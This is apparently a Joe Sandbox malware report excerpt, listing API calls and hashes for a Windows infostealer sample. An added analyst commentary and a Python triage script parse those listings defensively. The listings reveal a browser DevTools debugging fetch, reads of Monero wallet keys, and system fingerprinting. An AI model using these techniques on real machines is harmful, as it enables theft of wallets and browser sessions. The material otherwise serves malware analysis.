• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
• String ID:
• API String ID: 3627164727-0
• Opcode ID: a5a4fce1449d9a67d1a246572ff4039ae6d6a4a3f00d3a161e3f75d60ea6ab3a
• Instruction ID: ea02acafc1560114a5124751bbdcd4c0ac15825620c5aa84dc3355a042dc4a28
• Opcode Fuzzy Hash: a5a4fce1449d9a67d1a246572ff4039ae6d6a4a3f00d3a161e3f75d60ea6ab3a
• Instruction Fuzzy Hash: 74015876402926FBC733ABA1AD0C9DF3E6CFE4A362B144145F646910088B7E5641EBF5
APIs
• InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00FE7EF4
• InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 00FE7F25
• InternetCloseHandle.WININET(00000000), ref: 00FE7F36
• InternetReadFile.WININET(00000000), ref: 00FE7FA4
• InternetCloseHandle.WININET(?), ref: 00FE7FB4
• InternetCloseHandle.WININET(?), ref: 00FE7FC0
  • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
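The two API listings above are the most informative part of this dump. The WinINet function opens a session with the user-agent string WebSocketClient and fetches http://localhost:9223/json; a path of /json on a local port is the discovery endpoint of the Chromium DevTools remote-debugging protocol, which returns the WebSocket URLs of the open browser targets (9222 is the default port, the sample uses 9223). This section of the report does not show how that port came to be listening, so the request itself is the indicator to pivot on. The earlier function calls twelve unrelated USER32/KERNEL32 APIs with every argument NULL, a pattern consistent with junk API calls; the sandbox does not classify it. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses API listings in the line format used on this page, collects the arguments the sandbox resolved to text, flags local /json fetches, and applies a labelled all-NULL-argument heuristic. The embedded listings are copied from the two functions above; the names parse_calls, triage and looks_padded and the heuristic thresholds are choices made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the two API listings above, copied from the report. The sandbox renders
# NULL/unresolved arguments as 00000000 and unknown arguments as "?".
FUNC_MIXED = """\
  • Part of subcall function 00FE15AC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00FE15B6
  • Part of subcall function 00FE15AC: HeapAlloc.KERNEL32(00000000), ref: 00FE15BD
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00FE15F6
• GetLastError.KERNEL32 ref: 00FE15FC
• SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00FE1604
• GetWindowContextHelpId.USER32(00000000), ref: 00FE160B
• GetWindowLongW.USER32(00000000,00000000), ref: 00FE1613
• RegisterClassW.USER32(00000000), ref: 00FE161A
• IsWindowVisible.USER32(00000000), ref: 00FE1621
• ConvertDefaultLocale.KERNEL32(00000000), ref: 00FE1628
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FE1634
• IsDialogMessageW.USER32(00000000,00000000), ref: 00FE163C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FE1646
• HeapFree.KERNEL32(00000000), ref: 00FE164D
"""
FUNC_WININET = """\
• InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00FE7EF4
• InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 00FE7F25
• InternetCloseHandle.WININET(00000000), ref: 00FE7F36
• InternetReadFile.WININET(00000000), ref: 00FE7FA4
• InternetCloseHandle.WININET(?), ref: 00FE7FB4
• InternetCloseHandle.WININET(?), ref: 00FE7FC0
  • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
"""

# One bullet: optional "Part of subcall function X:" prefix, Api.MODULE, optional argument
# list, then the call-site address after "ref:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Chromium DevTools remote-debugging discovery URLs: /json, /json/list, /json/version.
DEVTOOLS_RE = re.compile(r"^https?://(?:localhost|127\.0\.0\.1):(\d+)/json(?:/|$)")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str]  # caller address for "Part of subcall function" entries


def parse_calls(listing: str) -> List[ApiCall]:
    """Parse an 'APIs' listing into ApiCall records; reject lines the regex cannot read."""
    calls = []
    for line in filter(str.strip, listing.splitlines()):
        m = CALL_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("parent")))
    return calls


def is_placeholder(arg: str) -> bool:
    """True for the sandbox's 8-digit hex literals (NULL, flags, pointers) and '?'."""
    return arg == "?" or re.fullmatch(r"[0-9A-F]{8}", arg) is not None


def string_args(calls: List[ApiCall]) -> List[str]:
    """Arguments the sandbox resolved to text (URLs, user agents, paths), in call order."""
    return [a for c in calls for a in c.args if not is_placeholder(a)]


def devtools_endpoints(calls: List[ApiCall]) -> List[Tuple[str, int, str]]:
    """(api, port, url) for each fetch of a local DevTools discovery URL."""
    return [(c.api, int(m.group(1)), a) for c in calls for a in c.args
            for m in [DEVTOOLS_RE.match(a)] if m]


def looks_padded(calls: List[ApiCall], min_apis: int = 8, min_modules: int = 2) -> bool:
    """Heuristic, thresholds chosen for this example: many distinct APIs from more than one
    module, all called with only NULL/unknown arguments, is consistent with junk calls."""
    own = [c for c in calls if c.parent is None]
    null_only = [c for c in own if all(a in ("00000000", "?") for a in c.args)]
    return (len({c.api for c in null_only}) >= min_apis
            and len({c.module for c in null_only}) >= min_modules)


def triage(name: str, listing: str) -> dict:
    calls = parse_calls(listing)
    return {
        "function": name,
        "strings": string_args(calls),
        # the first argument of InternetOpenA is the User-Agent the session will send
        "user_agents": [c.args[0] for c in calls
                        if c.api == "InternetOpenA" and c.args and not is_placeholder(c.args[0])],
        "devtools_endpoints": devtools_endpoints(calls),
        "null_arg_padding": looks_padded(calls),
    }


if __name__ == "__main__":
    for name, listing in (("00FE15F6", FUNC_MIXED), ("00FE7EF4", FUNC_WININET)):
        print(triage(name, listing))
```

The two checks are deliberately kept apart: the padding heuristic is a soft hint that a function's body is not where the behaviour lives, while a local /json fetch is a hard pivot point. A Chromium browser started with --remote-debugging-port is the usual reason such an endpoint exists, but since this section of the report does not show any browser launch, the port number should be treated as something to search the rest of the report for rather than as a conclusion.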
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandle$Open$FileReadXinvalid_argumentstd::_
• String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
• API String ID: 2589578820-1054772028
• Opcode ID: 459b9c0b31ea32e154ce881f6b8ea596d39a04c3bbc7129b20959c41f3fe1a19
• Instruction ID: 10c0c2d14bd99add12b802c859ae62f447339c5883b834ceb9357c1f62ac681a
• Opcode Fuzzy Hash: 459b9c0b31ea32e154ce881f6b8ea596d39a04c3bbc7129b20959c41f3fe1a19
• Instruction Fuzzy Hash: 1B417672D042E9AEDB21EF61DC49EEA7779EB08354F0000A9F689E2145C7B95FC89F50
APIs
• GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00FFB447
• GetFileSize.KERNEL32(?,00000000), ref: 00FFB4C0
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00FFB4DC
• ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00FFB4F0
• SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00FFB4F9
• ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00FFB509
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00FFB527
• ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00FFB537
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$PointerRead$HandleInformationSize
• String ID:
• API String ID: 2979504256-3916222277
• Opcode ID: a5393bbb2f373220f3e15426f37d0abbccfe15394f2c919f8b79ae7d2e743ead
• Instruction ID: 5e109931f56e2b93d1bcefb811e1a09bcbc8944209d5076d72555d496b480109
• Opcode Fuzzy Hash: a5393bbb2f373220f3e15426f37d0abbccfe15394f2c919f8b79ae7d2e743ead
• Instruction Fuzzy Hash: 535102B1D0021CAFDB29DF99D881ABDBBB9FF04314F18442AE611E6261D7389D45DF10
APIs
• _memset.LIBCMT ref: 00FE1ACC
  • Part of subcall function 00FE1A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FE1A55
  • Part of subcall function 00FE1A41: HeapAlloc.KERNEL32(00000000), ref: 00FE1A5C
  • Part of subcall function 00FE1A41: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00FE1AD9), ref: 00FE1A79
  • Part of subcall function 00FE1A41: RegQueryValueExA.ADVAPI32(00FE1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FE1A94
  • Part of subcall function 00FE1A41: RegCloseKey.ADVAPI32(00FE1AD9), ref: 00FE1A9D
• lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00FE1AE1
• lstrlenA.KERNEL32(?), ref: 00FE1AEE
• lstrcatA.KERNEL32(?,.keys), ref: 00FE1B09
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE1C1A
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
• DeleteFileA.KERNEL32(?), ref: 00FE1C8D
  • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
  • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
• String ID: .keys$\Monero\wallet.keys
• API String ID: 615783205-3586502688
• Opcode ID: f4f03847859312ab337f169c9c131293a7db24ee859e4e76e0bf5a6848dfa9c8
• Instruction ID: 1ef67441a8311668d9840898de51fd8efae00b69178436c8d1fab15dd0970f70
• Opcode Fuzzy Hash: f4f03847859312ab337f169c9c131293a7db24ee859e4e76e0bf5a6848dfa9c8
• Instruction Fuzzy Hash: DC511D72D4016E9BCF60BB65DD46AED7378AF00304F4144E1B708B7112DA796F89AF84
APIs
• lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 00FEDD6F
• strchr.MSVCRT ref: 00FEDD81
• strchr.MSVCRT ref: 00FEDDA6
• lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDC8
• GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEDDD5
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDDC
• strcpy_s.MSVCRT ref: 00FEDE23
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
• String ID: 0123456789ABCDEF
• API String ID: 453150750-2554083253
• Opcode ID: bf838c276ca3fd25cc250aec75184fc764b0613320a74dd7f4815eb802b3bf43
• Instruction ID: a877261a049525bfea26a4a69d6e4d3b1440a971c1b6fc5e252d45781537777d
• Opcode Fuzzy Hash: bf838c276ca3fd25cc250aec75184fc764b0613320a74dd7f4815eb802b3bf43
• Instruction Fuzzy Hash: 30317072D002599FDF11DFE9DC49ADEBBB9AF08310F100129E901FB285DB76A908DB90
APIs
• UnDecorator::getArgumentList.LIBCMT ref: 00FFF407
  • Part of subcall function 00FFEFA2: Replicator::operator[].LIBCMT ref: 00FFF025
  • Part of subcall function 00FFEFA2: DName::operator+=.LIBCMT ref: 00FFF02D
• DName::operator+.LIBCMT ref: 00FFF460
• DName::DName.LIBCMT ref: 00FFF4B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
• String ID: ,...$,<ellipsis>$...$<ellipsis>$void
• API String ID: 834187326-2211150622
• Opcode ID: 26e4f4600d23553c909f6ea47b6ee8a1767e6b671d6417342b6317fbc9d4dca4
• Instruction ID: 9f3b4910e931d8b7c9a5bddcfaa4b5d556e9404f83e888fa57968d92918a3c89
• Opcode Fuzzy Hash: 26e4f4600d23553c909f6ea47b6ee8a1767e6b671d6417342b6317fbc9d4dca4
• Instruction Fuzzy Hash: E6217F316002099FCB11CF1CD4849B97BB4FF457A8B548094E989DB27ACB39D907EF54
APIs
• UnDecorator::UScore.LIBCMT ref: 01000D85
• DName::DName.LIBCMT ref: 01000D91
  • Part of subcall function 00FFEA5C: DName::doPchar.LIBCMT ref: 00FFEA8D
• UnDecorator::getScopedName.LIBCMT ref: 01000DD0
• DName::operator+=.LIBCMT ref: 01000DDA
• DName::operator+=.LIBCMT ref: 01000DE9
• DName::operator+=.LIBCMT ref: 01000DF5
• DName::operator+=.LIBCMT ref: 01000E02
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
• String ID: void
• API String ID: 1480779885-3531332078
• Opcode ID: a19cd2b2135e7f62739908dd85b095d0d0cf9e19f61e8d6af701831b2c161fec
• Instruction ID: 9e73e11240fdecb417f8aaae6f4b1cbf4845c66ac2cdf3b0968c9fe624381b9a
• Opcode Fuzzy Hash: a19cd2b2135e7f62739908dd85b095d0d0cf9e19f61e8d6af701831b2c161fec
• Instruction Fuzzy Hash: F6115E71500249AFE71AEB68CC55BBD7BA0AF10340F044099F18B9B2FADB74AA41CB51
APIs
• CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00FF1798
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00FF17A3
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FF17AE
• ReleaseDC.USER32(00000000,00000000), ref: 00FF17B9
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC), ref: 00FF17C5
• HeapAlloc.KERNEL32(00000000,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF17CC
• wsprintfA.USER32 ref: 00FF17DE
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Similarity
• API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
• String ID: %dx%d
• API String ID: 3940144428-2206825331
• Opcode ID: fbdd72528526ab1cd38bc175ff4b282f9a61b20de0bb4150650619bce4617570
• Instruction ID: b626987a855867119e2d657412cd2c8e56fd38fbcca8502aed8c3b1b510d7976
• Opcode Fuzzy Hash: fbdd72528526ab1cd38bc175ff4b282f9a61b20de0bb4150650619bce4617570
• Instruction Fuzzy Hash: 33F0AF72A01224BFD7302BA5BC4DDAB7EACFF467A2B004014F705D2144C6B54C008BE4
APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
  • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
  • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE6828
• StrCmpCA.SHLWAPI(?), ref: 00FE6848
• InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00FE6869
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FE6884
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FE68BA
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FE68EA
• CloseHandle.KERNEL32(?), ref: 00FE6915
• InternetCloseHandle.WININET(00000000), ref: 00FE691C
• InternetCloseHandle.WININET(?), ref: 00FE6928
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
• String ID:
• API String ID: 2507841554-0
• Opcode ID: 083836f508b4e27feeb49895c3715de7368681c8cce89e4818c7fdf37b0984b6
• Instruction ID: 8fb729c09fe1a8ac9f756465ca6a3477eeaaa02a53de07d82c7dbd9e1df07e4e
• Opcode Fuzzy Hash: 083836f508b4e27feeb49895c3715de7368681c8cce89e4818c7fdf37b0984b6
• Instruction Fuzzy Hash: DC412AB190016CAFDF309B21EC49BDA7BB9FF44354F1040A5BB09E2152D671AE85DFA4
APIs
• _free.LIBCMT ref: 010060D4
• _free.LIBCMT ref: 010060E2
• _free.LIBCMT ref: 010060ED
• _free.LIBCMT ref: 010060C1
  • Part of subcall function 00FFD3DB: HeapFree.KERNEL32(00000000,00000000,?,00FFCC2D,00000000,0101A794,00FFCC74,00FEF100,?,?,00FFCD5E,0101A794,?,?,0100E6D8,0101A794), ref: 00FFD3F1
  • Part of subcall function 00FFD3DB: GetLastError.KERNEL32(?,?,?,00FFCD5E,0101A794,?,?,0100E6D8,0101A794,?,?,?), ref: 00FFD403
• ___free_lc_time.LIBCMT ref: 0100610B
• _free.LIBCMT ref: 01006116
• _free.LIBCMT ref: 0100613B
• _free.LIBCMT ref: 01006152
• _free.LIBCMT ref: 01006161
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lc_time
• String ID:
• API String ID: 3704779436-0
• Opcode ID: 9f5cc1072a080d2a93c850d1249c83dbb2a2d2e1fe2cb34a2dc1be2efc9d859f
• Instruction ID: fb77d415b20b02a6fe8ebdf82548f61f06f8d284fc9d8ac6dcde573387a2f88b
• Opcode Fuzzy Hash: 9f5cc1072a080d2a93c850d1249c83dbb2a2d2e1fe2cb34a2dc1be2efc9d859f
• Instruction Fuzzy Hash: 4711CB711047099BFB726FACDC85AAA77F7EF01300F140879F38597592DA3994508B12
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 00FEFE1C
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00FEFE48
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEFE8B
                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00FEFFE1
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF4D4: _memmove.LIBCMT ref: 00FEF4EE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
